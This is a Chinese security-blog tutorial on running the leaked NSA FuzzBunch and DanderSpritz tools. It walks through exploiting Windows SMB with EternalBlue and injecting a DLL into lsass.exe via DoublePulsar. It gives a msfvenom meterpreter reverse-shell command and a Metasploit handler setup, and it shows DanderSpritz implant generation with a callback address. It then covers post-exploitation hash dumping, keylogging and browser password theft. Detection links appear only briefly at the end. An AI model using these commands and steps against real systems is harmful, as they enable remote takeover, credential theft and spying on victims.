安全路透社
当前位置:安全路透社 > 安全客 > 正文

【技术分享】NSA泄露黑客工具之 FuzzBunch & DanderSpritz 分析

http://p2.qhimg.com/t0187d930bc4589e234.png


传送门


【技术分享】NSA泄露工具中的Dander Spiritz工具使用简易教程

【漏洞分析】MS 17-010:NSA Eternalblue SMB 漏洞分析

Shadow Brokers是什么


影子经纪(Shadow Brokers)声称攻破了为NSA开发网络武器的美国黑客团队方程式组织(Equation Group)黑客组织的计算机系统,并下载了他们大量的攻击工具(包括恶意软件、私有的攻击框架及其它攻击工具)。

方程式组织(Equation Group)是一个由卡巴斯基实验室发现的尖端网络犯罪组织,后者将其称为世界上最尖端的网络攻击组织之一,同震网(Stuxnet)和火焰(Flame)病毒的制造者紧密合作且在幕后操作。


Shadow Brokers大招回顾


2016年8月15日:

公布了思科ASA系列防火墙,思科PIX防火墙的漏洞。

2017年4月08日: 

公布了针对Solaris远程0day漏洞。

2017年4月14日:

公布了针对Windows系统漏洞及利用工具。

下载地址:https://github.com/x0rz/EQGRP_Lost_in_Translation 

2017年4月14日大招分析

目录文件说明:

Windows:包含Windows漏洞、后门、利用工具,等配置文件信息。

http://p7.qhimg.com/t019d24e2f5cbe80630.png

swift:包含来自银行攻击的操作说明

http://p4.qhimg.com/t01c0f12c9da247cff8.png

  oddjob:与ODDJOB后门相关的文档

http://p5.qhimg.com/t01659554c886787b96.png

漏洞对应说明

http://p8.qhimg.com/t018be6080d2ca98c2a.png

FUZZBUNCH&DanderSpritz分析


要使用FUZZBUNCH框架需要注意以下几点

1.将工具放在英文路径下,不能含有中文,目标机防火墙关闭

2.必须Python2.6和pywin32对应版本。

3.在windows利用工具目录下创建listeningposts目录,看清楚了是window利用工具目录,不是c:window目录。

4.系统使用32位

Python2.6+pywin32下载 链接:http://pan.baidu.com/s/1hsyvTOw 密码:o1a1

FuzzBunch有点类似于metasploit,并且可跨平台,通过fb.py使用,

http://p6.qhimg.com/t01a82563c3bf4ab2d4.png

FuzzBunch框架的执行,需要各种配置项

1.目标的IP地址,攻击者的;

2.指示转发选项是否将被使用;

3.指定log日志目录;

4.该项目名称。

http://p0.qhimg.com/t0154cb25d656fae8a9.png

在以上的配置中,Target ip(被攻击机器)IP地址是192.168.69.42,Callback IP(回调地址)也就是运行fb.py框架的IP地址。

配置完成之后,进入下一步,使用help查看帮助命令。

http://p2.qhimg.com/t016aea35325478fce7.png

use命令的用途是选择插件,如下所列:

http://p9.qhimg.com/t01c9208f000315eccf.png

插件被分解成几类:

目标识别和利用漏洞发现:Architouch,Rpctouch,Domaintouch,Smbtouch等。;

漏洞利用:EternalBlue,Emeraldthread,Eclipsedwing,EternalRomance等。;

目标攻击后后操作:Douplepulsar,Regread,Regwrite等。

然后我们通过使用Smbtouch使用smb协议来检测对方操作系统版本、架构、可利用的漏洞。

http://p8.qhimg.com/t01ab239cabec55951b.png

http://p4.qhimg.com/t01edbeddbb69d5d255.png

在这个例子中,目标系统似乎有三个漏洞可以利用(EternalBlue,EternalRomance和EternalChampion),经过这几天的测试,我发现EternalBlue比较稳定,我直接选择使用EternalBlue这个漏洞利用工具。

http://p1.qhimg.com/t019b67b39a7585aeb9.png

http://p2.qhimg.com/t0164ad60cba1715a19.png

使用EternalBlue漏洞利用成功之后,会在内核中留一个后门。

http://p8.qhimg.com/t01dc2f3c1278d22e6b.png

通过返回的信息,可以看出攻击成功,用了不到10秒钟的时间,攻击成功之后并不能直接执行命令,需要用框架的其他的插件配合。

攻击成功之后就可以开始使用DoublePulsar插件,DoublePulsar类似于一个注入器,有以下几个功能。

Ping: 检测后门是否部署成功

RUNDLL:注入dll。

RunShellcode:注入shellcode

Uninstall:用于卸载系统上的后门 

在这里我使用RUNDLL来注入dll到目标系统,在注入之前,我打开metasploit生成个dll。也可以使用cobaltstrike等,注意:msf生成的dll注入到wwin7进程的时候,win7可能会重启。

  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.38.129 LPORT=8089 -f dll > c.dll

http://p8.qhimg.com/t018cf8d320d99f950d.png

打开metasploit监听反弹端口

    $ msfconsole
    msf > use exploit/multi/handler
    msf > set LHOST 192.168.38.129
    msf > set LPORT 8089
    msf > set PAYLOAD windows/x64/meterpreter/reverse_tcp
    msf > exploit

http://p7.qhimg.com/t01a270e4e70ab0058e.png

配置DoublePulsar来注入dll

http://p8.qhimg.com/t014a56d64824759329.png

注入DLL到Lsass.exe进程,通过metasploit控制目标机器。

http://p3.qhimg.com/t0185551585be78fe5f.png


DanderSpritz介绍


DanderSpritz是nsa著名的RAT,很多的反病毒厂商都抓到过此RAT的样本,信息收集模块做的特别全。

使用python start_lp.py启动,设置好配置信息之后,功能就可以使用。

http://p7.qhimg.com/t0106d59c19cdca1814.png

打开之后我们可在终端进行输入help,进行查看帮助信息。

http://p6.qhimg.com/t01a76e58fbf7e72f23.png

可用命令的数量比FuzzBunch要多一些,我研究此远控的目的是为了能生成dll文件,配合DoublePulsar使用,直接反向连接到DanderSpritz,我本人不是特别喜欢用metasploit,很多的防护设备已经有了metasploit的特征,容易发现。还有metasploit生成的dll在使用DoublePulsar注入到win7的时候,win7会重启。

经过一番查找,发现pc_prep负责生成有效载荷。

http://p7.qhimg.com/t01d998d0677c3b404b.png

pc_prep有点类似于msfvenom。使用命令pc_prep -sharedlib列出可生成dll的选项,来生成一个DLL的马儿,配置信息如下:

pc_prep -sharedlib
- Possible payloads:
-      0) - Quit
-      1) - Standard TCP (i386-winnt Level3 sharedlib)
-      2) - HTTP Proxy (i386-winnt Level3 sharedlib)
-      3) - Standard TCP (x64-winnt Level3 sharedlib)
-      4) - HTTP Proxy (x64-winnt Level3 sharedlib)
-      5) - Standard TCP Generic (i386-winnt Level4 sharedlib)
-      6) - HTTP Proxy Generic (i386-winnt Level4 sharedlib)
-      7) - Standard TCP AppCompat-enabled (i386-winnt Level4 sharedlib)
-      8) - HTTP Proxy AppCompat-enabled (i386-winnt Level4 sharedlib)
-      9) - Standard TCP UtilityBurst-enabled (i386-winnt Level4 sharedlib)
-     10) - HTTP Proxy UtilityBurst-enabled (i386-winnt Level4 sharedlib)
-     11) - Standard TCP WinsockHelperApi-enabled (i386-winnt Level4 sharedlib)
-     12) - HTTP Proxy WinsockHelperApi-enabled (i386-winnt Level4 sharedlib)
-     13) - Standard TCP (x64-winnt Level4 sharedlib)
-     14) - HTTP Proxy (x64-winnt Level4 sharedlib)
-     15) - Standard TCP AppCompat-enabled (x64-winnt Level4 sharedlib)
-     16) - HTTP Proxy AppCompat-enabled (x64-winnt Level4 sharedlib)
-     17) - Standard TCP WinsockHelperApi-enabled (x64-winnt Level4 sharedlib)
-     18) - HTTP Proxy WinsockHelperApi-enabled (x64-winnt Level4 sharedlib)
Pick the payload type
3
Update advanced settings
NO
Perform IMMEDIATE CALLBACK?
YES
Enter the PC ID [0]
0
Do you want to LISTEN?
NO
Enter the callback address (127.0.0.1 = no callback) [127.0.0.1]
192.168.38.128
Change CALLBACK PORTS?
NO
Change exe name in version information?
NO
- Pick a key
-   0) Exit
-   1) Create a new key
-   2) Default
Enter the desired option
2
- Configuration:
-
- <?xml version='1.0' encoding='UTF-8' ?>
- <PCConfig>
-   <Flags>
-     <PCHEAP_CONFIG_FLAG_CALLBACK_NOW/>
-     <PCHEAP_CONFIG_FLAG_DONT_CREATE_WINDOW/>
-   </Flags>
-   <Id>0x0</Id>
-   <StartListenHour>0</StartListenHour>
-   <StopListenHour>0</StopListenHour>
-   <CallbackAddress>192.168.38.139</CallbackAddress>
- </PCConfig>
-
Is this configuration valid
YES
Do you want to configure with FC?
NO
- Configured binary at:
-   E:\Logs\z0.0.0.1\z0.0.0.1\Payloads\PeddleCheap_2017_04_17_08h49m06s.296/PC_Level3_dll.configured

DanderSpritz(RAT)PeddleCheap选项提供三种马儿连接选择

我选择了监听方式,也就是反向连接。

然后开始监听端口,默认监听端口TCP/53,TCP/80,TCP/443,TCP/1509:

http://p7.qhimg.com/t012eec38c3d0109ab4.png

现在我们配合DoublePulsar来使用,让DoublePulsar把DanderSpritz生成的dll注入到lsass.exe进程

http://p6.qhimg.com/t0175df1692ab1bddce.png

然后DanderSpritz接收到的请求要求接受它。一旦yes接受连接,终端开始滚动了很多有关目标的信息,会自动执行各种命令,有一些命令需要确认,

ARP表

路由表

系统信息

端口信息

进程列表(一些过程,如那些由虚拟化用于以不同的颜色被突出显示);

内存状态

USB的信息

计划任务分析

安装语言和操作系统的版本

磁盘和可用空间的列表

等……………..

http://p0.qhimg.com/t016d4df397a4be73f9.png

http://p2.qhimg.com/t0128f7a3e21bb9140e.png

http://p8.qhimg.com/t01b274dbc210a8c43b.png

如果你不想从命令行查看,也可以打开插件图形化来查看以上的信息

查看网络信息

http://p1.qhimg.com/t015f34c5867f4eceb4.png

http://p5.qhimg.com/t014ad8d3d43ab04eb5.png

查看进程

http://p7.qhimg.com/t01acdb4e23d0dc47bb.png

打开一个shell(cmd)

http://p3.qhimg.com/t0191190649531be90c.png

通过信息收集之后,我们大概可以确认目标网络情况.就可以实施下一步的攻击。

截图

http://p2.qhimg.com/t011363f694e618d8f5.png

hash获取

http://p8.qhimg.com/t012b6df076371bcae1.png

扫描端口

http://p1.qhimg.com/t01147d61a0e7cca9e6.png

安装键盘记录功能

键盘记录需要使用YAK安装下,之后才可以使用。 

http://p0.qhimg.com/t01ec30d5986793de24.png

Firefox Skype等密码获取

http://p9.qhimg.com/t01a87cc9482353972e.png

除了这些插件之外,还有很多的插件,比如日志eventlogedit, 可以自行研究下。

漏洞检测工具

https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb 

把smb_ms17_010.rb下载回来,放在自己新建的exp目,启动metasploit,在msf提示符下输入reload_all重新加载所有模块

http://p1.qhimg.com/t0137e576e843b6104b.png

感染检测

https://github.com/countercept/doublepulsar-detection-script 

存在漏洞

http://p1.qhimg.com/t01a1ee9b73e3fa462f.png

传送门


【技术分享】NSA泄露工具中的Dander Spiritz工具使用简易教程

【漏洞分析】MS 17-010:NSA Eternalblue SMB 漏洞分析


本文地址:http://bobao.360.cn/learning/detail/3743.html

未经允许不得转载:安全路透社 » 【技术分享】NSA泄露黑客工具之 FuzzBunch & DanderSpritz 分析

赞 (0)
分享到:更多 ()

评论 0

评论前必须登录!

登陆 注册